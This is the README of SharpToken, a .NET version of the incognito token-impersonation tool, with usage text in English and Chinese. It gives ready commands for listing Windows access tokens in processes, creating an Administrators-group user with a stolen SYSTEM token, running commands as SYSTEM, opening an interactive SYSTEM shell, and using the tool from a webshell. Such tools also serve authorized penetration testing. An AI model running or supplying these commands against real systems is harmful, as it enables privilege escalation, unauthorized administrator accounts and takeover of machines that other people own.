SharpToken

.NET版本的incognito

Usage

SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

Usage:

SharpToken COMMAND arguments

COMMANDS:

        list_token [process pid]

        list_all_token [process pid]

        add_user <tokenUser> <username> <password> [group] [domain]

        delete_user <tokenUser> <username> [domain]

    execute <tokenUser> <commandLine> [Interactive]


example:
    SharpToken list_token
    SharpToken list_token 6543
    SharpToken add_user "NT AUTHORITY\SYSTEM" admin 123456 Administrators
    SharpToken delete_user "NT AUTHORITY\SYSTEM" admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true

枚举Token

枚举的信息包括SID,LogonDomain,UserName,Session,LogonType,TokenType,TokenHandle(Duplicate后的Token句柄),TargetProcessId(Token来源的进程),TargetProcessToken(Token在源进程的句柄)，Groups(Token用户所在组)

SharpToken list_token

从指定进程枚举Token

SharpToken list_token 468

获得交互式shell

execute "NT AUTHORITY\SYSTEM" cmd true

获取命令执行结果(webshell下执行)

SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"